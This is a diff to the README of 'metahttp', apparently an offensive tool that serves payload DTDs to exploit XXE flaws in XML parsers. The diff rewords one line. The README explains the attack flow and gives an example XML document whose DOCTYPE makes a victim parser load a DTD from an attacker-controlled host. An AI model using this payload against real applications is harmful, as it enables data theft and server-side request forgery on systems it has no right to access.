vp777/metahttp/Readme.md

 ## How it works

 Initially, metahttp hosts an HTTP server that is responsible to deliver the payload DTDs to the target application.

 Then the attacker triggers the XXE to have the target server load the DTDs from the server hosted by metahttp.

-For example, the external DTDs could be loaded with the following XML document to the victim parser:
+For example, by having the victim application parse the following XML document:
 ```xml
 <!DOCTYPE r SYSTEM "http://attacker_host:8080/serveme.dtd"><r></r>
 ```